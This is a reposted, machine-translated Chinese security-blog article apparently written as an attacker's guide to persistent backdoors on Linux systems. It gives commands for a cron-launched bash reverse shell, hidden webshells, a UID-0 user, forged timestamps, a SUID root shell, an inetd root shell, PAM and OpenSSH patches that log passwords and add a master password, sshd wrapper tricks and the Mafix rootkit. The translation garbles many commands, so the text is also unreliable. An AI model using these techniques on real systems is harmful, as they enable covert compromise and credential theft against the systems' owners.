Reproduced Linux Backdoor finishing collection (pulse recommended)

I'm thinking about getting in touch .... It is forbidden to reprint ....

Brief introduction

Use Unix/linux's own Bash and Crond to achieve remote control, and keep bouncing off-line to the public network machine.

Utilization method

Create a/etc/xxxx script file (first name yourself) and use the script to bounce back. The following script represents a fully automatic bounce to the 8.8.8.8 53 port.

Nano/etc/xxxx

#!/bin/bashif netstat-ano|grep-v grep | grep "8.8.8.8" >/dev/nullthenecho "OK" >/dev/nullelse/sbin/iptables--policy INPUT accept/sbin/iptables--policy OUTPUT acceptbash-i >&/dev/tcp/8.8.8.8/53 0>&1fi

chmod +sx/etc/xxxx

Then we need to modify the/etc/crontab so that it executes periodically.

Nano/etc/crontab Add this line at the end of the/etc/crontab file. The delegate executes every 1 minutes.

*/1 * * * * root/etc/xxxx

Finally restart the Crond service. (different version of the restart mode, self-query)

Service Cron Reload

Service Cron Start

You can then use NC to receive the Shell on the 8.8.8.8 server.

NC-VV-LP 53

Linux/unix hidden files and folders

Linux/unix want to hide Webshell or back door or something, you can use the hidden folders and files.

Method One

For example, create a name at the beginning of the band. Webshell or folders, by default, will not be displayed, the browser when access to add a few access to the line. (View method:ls-a)

Touch. webshell.php create a file named. webshell.php

mkdir. backdoor/create a folder named. Backdoor

The ultimate approach

In the case of the administrator drinking too much or brain can not turn around, is absolutely not found! At least it took me so long to find a few.

Is the file words browser access directly to lose ... On the line, the catalogue is the same.

Touch ... Create a name for ... of the file

Mkdir... Create a name for ... The folder

Effect

This article "Linux Backdoor finishing collection (pulse recommended)" by the ARMYZER0 team original submission Security pulse, the author of the old driver, the security pulse secpulse.com exclusive published this article, if necessary reprint, please contact the security pulse authorization, unauthorized do not reprint.

Linux/unix Adding a user with a UID of 0

Brief introduction

Under the Unix system, the UID is 0, which is the root privilege. So when infiltration can add a UID of 0 users as the backdoor.

Use Method

Useradd-o-U 0 Backdoor

Linux/unix modifying file timestamps

Brief introduction

Unix under the hidden back door must be modified time, otherwise it is easy to be found, directly using touch .

For example, referring to the time of index.php, and then to webshell.php, the result of two files is the same time.

Use Method

Touch-r index.php webshell.php

or modify the timestamp directly to a certain day of the year. January 02, 2014 below.

Touch-t 1401021042.30 webshell.php

System environment:

dawg:~# uname-a

Linux Dawg 2.4.20-1-386 #3 Sat Mar 12:11:40 EST 2003 i686 Gnu/linux

SUID Shell

Use Method

First, switch to the root user and execute the following command:

dawg:~# Cp/bin/bash/.woot

dawg:~# chmod 4755/.woot

dawg:~# Ls-al/.woot

-rwsr-xr-x 1 root root 690668 Jul 17:14/.woot

Of course, you can also play other more hidden names, I think the wretched and witty you, will certainly come up with a lot of good names.

The point in front of the file is not necessary, just to hide the file (at the top of the file name, add ".", you can hide it in any file directory).

Now, as an ordinary user, let's enable this backdoor:

[Email protected]:~$ ID

uid=1000 (FW) gid=1000 (FW) groups=1000 (FW)

[Email protected]:~$/.woot.woot-2.05b$ ID

uid=1000 (FW) gid=1000 (FW) groups=1000 (FW). woot-2.05b$

Why not?

Because BASH2 has some security measures against suid. But this is not an inalienable:

. woot-2.05b$/.woot-p

. woot-2.05b# ID

uid=1000 (FW) gid=1000 (fw) Euid=0 (Root) groups=1000 (FW)

Use the-p parameter to get a root shell. This euid means that the effective user ID

It is important to note that when executing this suid shell as a normal user, you must use the full path.

Small knowledge:

How to find those files that have suid:

dawg:~# Find/-perm +4000-ls

This will return the file with the SUID bit.

Remote Backdoor

Utilization method

We use VI to modify the/etc/inetd.conf file

Original file:

#chargen dgram udp wait root internal#discard stream TCP nowait root internal#discard dgram udp wait root internal#daytime Stream TCP nowait root internal

Modified to:

#discard stream TCP nowait root internal#discard dgram udp wait root internaldaytime stream TCP nowait Root/bin/bash bash -I.

Open inetd:

dawg:~# inetd

If you want to force a restart of inetd:

dawg:~# Ps-ef | grep inetdroot 362 1 0 Jul22? 00:00:00/usr/sbin/inetdroot 13769 13643 0 17:51 pts/1 00:00:00 grep inetddawg:~# kill-hup 362

Now we can use NC to burst the chrysanthemum:

C:tools 192.168.1.77:inverse Host Lookup Failed:h_errno 11004:no_data (UNKNOWN) [192.168.1.77] (Daytime) Openbash:no Job control in this shellbash-2.05b# bash-2.05b#bash-2.05b# iduid=0 (root) gid=0 (root) groups=0 (root) bash-2.05b# uname- Alinux Dawg 2.4.20-1-386 #3 Sat April 12:11:40 EST 2003 i686 Gnu/linux

You can modify the/etc/services file by adding the following items:

Woot 6666/tcp #evil Backdoor Service

Then modify the/etc/inetd.conf:

Woot stream TCP nowait Root/bin/bash bash-i

We can modify it into some common ports to achieve the hidden.

Pam back Door

Brief introduction

PAM (pluggable authenticationmodules) is a certification mechanism presented by Sun.

It separates the services provided by the system and the authentication of the service by providing some dynamic link libraries and a unified set of APIs, allowing system administrators the flexibility to configure different authentication methods for different services as needed without changing the service program, while also facilitating the addition of new authentication methods to the system.

Pam was originally integrated in Solaris and has now been ported to other systems such as Linux, SunOS, hp-ux9.0, and so on.

The main idea of building Pam back door: pam_unix_auth.c patch installation to the normal Pam module.

Utilization method

1. Get the PAM version used by the target system:

RPM-QA |grep Pam

2. Compile and install Pam

3, the local pam_unix_auth.c file by patching the way, compile and build.

4, compiled after the file in: modules/pam_unix/.libs/pam_unix.so, backdoor password for root123, and will log the root password in/tmp/pslog.

Characteristics:

Advantages: Strong concealment, not easy to be found.
Disadvantage: Need to compile the environment, lack of GCC or other dependent packages prone to problems

OpenSSH back Door

Brief introduction

Download the new version of OpenSSH and download the corresponding patch package, this patch file contains the Sshbd5.9p1.diff file as a backdoor file,

Documents include: AUTH.C, AUTH-PAM.C, AUTH-PASSWD.C, canohost.c, Includes.h, log.c, SERVCONF.C, sshconnect2.c, SSHLOGIN.C, Version.h

Use Method

#tar-ZXVF openssh-5.9p1.tar.gz

#tar-ZXVF 0x06-openssh-5.9p1.patch.tar.gz

Vim Includes.h//Modify backdoor password, record file location,

/*

#define ILOG "/tmp/ilog"//Record the user name and password to log on to the computer

#define OLOG "/tmp/olog"//log machine login to the remote username and password

#define SECRETPW "root123"//password for your back door

*/

Characteristics:

Advantages: Strong concealment, not easy to be found.
Disadvantage: Need to compile the environment, lack of GCC or other dependent packages prone to problems.

quick access to SSH backdoor

Brief introduction

Executes the command will derive a 31337 port, then connects 31337, uses the root/bin/ftp/mail when the user name, the password is arbitrary, may log in.

Use Method

Execute on the remote host:

#ln-sf/usr/sbin/sshd/tmp/su;/tmp/su-oport=31337;

Will derive a 31337 port, and then connect 31337, with Root/bin/ftp/mail when the user name, password arbitrary, you can login.

Characteristics:

Advantage: Weak concealment, suitable for short time connection.
Disadvantage: After reboot, it will be disconnected, unable to rebound after the connection.

SSH Wrapper Backdoor

Brief introduction

Init starts with/USR/SBIN/SSHD, the script executes to getpeername here, the regular match will fail, so execute the next sentence, start the/usr/bin/sshd, this is the original sshd.

After the original SSHD listener port establishes a TCP connection, it will fork a sub-process to handle the specific work. This sub-process, there is no test, but the direct execution of the system default location of the/usr/sbin/sshd, this way of control back to the script.

At this point the child process standard input output has been redirected to the socket, getpeername can really get to the client TCP source port, if it is 19526 to execute sh to a shell.

Use Method

Client:
[Email protected] ~]# Cd/usr/sbin

[Email protected] sbin]# mv sshd. /bin

[Email protected] sbin]# echo ' #!/usr/bin/perl ' >sshd

[[email protected] sbin]# echo ' exec '/bin/sh ' if (getpeername (STDIN) =~/^ ... 4a/); ' >>sshd

[Email protected] sbin]# echo ' exec{"/usr/bin/sshd"} "/usr/sbin/sshd", @ARGV, ' >>sshd

[Email protected] sbin]# chmod u+x sshd

[Email protected] sbin]#/etc/init.d/sshd restart

Control side:
Socat stdiotcp4:target_ip:22,sourceport=19526

Characteristics:

Advantages: Strong concealment, no need to compile, for most of the environment.
Disadvantage: The sshd process needs to be restarted.

mafix rootkit Create Backdoor

Brief introduction

Mafix is a commonly used lightweight application level rootkits, which is characterized by a simple configuration and customizable authentication password and port number for remote login by forging an SSH protocol vulnerability.

Use Method

Once the installation is complete, you can log in remotely using the port configured by the SSH user @ip-p.

Characteristics:

Advantages: Hidden in general, no need to compile.
Disadvantage: will replace LS and other commands, easy to be detected

This article "Linux Backdoor finishing collection (pulse recommended)" by the ARMYZER0 team original submission Security pulse, the author of the old driver, the security pulse secpulse.com exclusive published this article, if necessary reprint, please contact the security pulse authorization, unauthorized do not reprint.

Reproduced Linux Backdoor finishing collection (pulse recommended)